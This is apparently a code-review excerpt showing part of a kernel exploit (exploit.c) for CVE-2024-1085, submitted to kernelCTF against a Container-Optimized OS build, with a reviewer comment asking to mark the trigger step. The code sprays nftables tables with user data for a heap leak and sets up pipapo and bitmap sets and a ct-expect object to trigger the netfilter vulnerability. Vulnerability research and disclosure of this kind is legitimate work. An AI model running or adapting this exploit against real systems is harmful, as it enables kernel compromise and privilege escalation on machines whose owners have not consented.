pocs/linux/kernelctf/CVE-2024-1085_cos/exploit/cos-105-17412.226.43/exploit.c

```diff
@@ -0,0 +1,339 @@
+    int i;
+    for(i=0;i<num;i++){
+    	total_size = total_size + NLMSG_ALIGN(msg_list[i]->nlmsg_len);
+    }
+    char *buf = malloc(total_size);
+    memset(buf, 0, total_size);
+    memcpy(buf, hdr1, NLMSG_ALIGN(hdr1->nlmsg_len));
+    char *off = buf + NLMSG_ALIGN(hdr1->nlmsg_len);
+    for(i=0;i<num;i++){
+    	memcpy(off, msg_list[i], NLMSG_ALIGN(msg_list[i]->nlmsg_len));
+	off = off + NLMSG_ALIGN(msg_list[i]->nlmsg_len);
+    }
+    memcpy(off, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len));
+    int res = nl_sendto(socket, buf, total_size);
+    if (res < 0) {
+        printf("sending message failed\n");
+    }
+}
+
+int nl_callback_get_table(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_TABLE_MAX+1];
+    memset(tb_msg, 0, NFTA_TABLE_MAX * 8);
+    //printf("Get message back!\n");
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //printf("Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL);
+    char * table_name=NULL;
+    char * set_name=NULL;
+    if (tb_msg[NFTA_TABLE_NAME]){
+        printf("Getting %s\n", nla_get_string(tb_msg[NFTA_TABLE_NAME]));
+    }
+    if (tb_msg[NFTA_TABLE_USERDATA]){
+	free(table_udata);
+	table_udata = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+	nla_memcpy(table_udata, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA]));
+    }
+    return NL_OK;
+}
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
+   char *tmp = malloc(0x100);
+   memset(tmp,0,0x100);
+   int i;
+   for(i=0;i<len;i++){
+        snprintf(tmp, 0x100, "table_for_leak_%ld", table_num);
+        new_table_with_udata(socket, tmp, udata, size);
+        ++table_num;
+   }
+   free(tmp);
+}
+
+void exploit(struct nl_sock *socket){
+    int i;
+    char *table = "table for exp";
+    char *pipapo_set = "set pipapo for exp";
+    char *bitmap_set = "set bitmap for exp";
+    char *target_obj = "obj for exp";
+
+    new_table(socket, table);
+    new_set_pipapo(socket,table, pipapo_set, NFT_OBJECT_CT_EXPECT);
+    new_set_bitmap(socket, table, bitmap_set);
+    
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    uint64_t hash_key;
+    
+    char *test_table = "test table";
+    memset(key,0,0x40);
+    memset(key_end,0,0x40);
+    spray_tables(socket,0x100, pad, 0xd0);
+    new_obj_ct_expect(socket, table, target_obj, NULL, 0);
+    new_setelem(socket, table, pipapo_set, pad, 0xc0, target_obj, NULL, 0, NULL, 0, 1);
+    new_table_with_udata(socket, test_table, pad, 0xd0);
+    spray_tables(socket,0x100, pad, 0xd0);
+    struct nlmsghdr **msg_list = malloc(sizeof(struct nlmsghdr *)*5);
```

Comment:
Comment here that this is "step 2" based on the writeup, also include that this part triggers the vulnerability itself.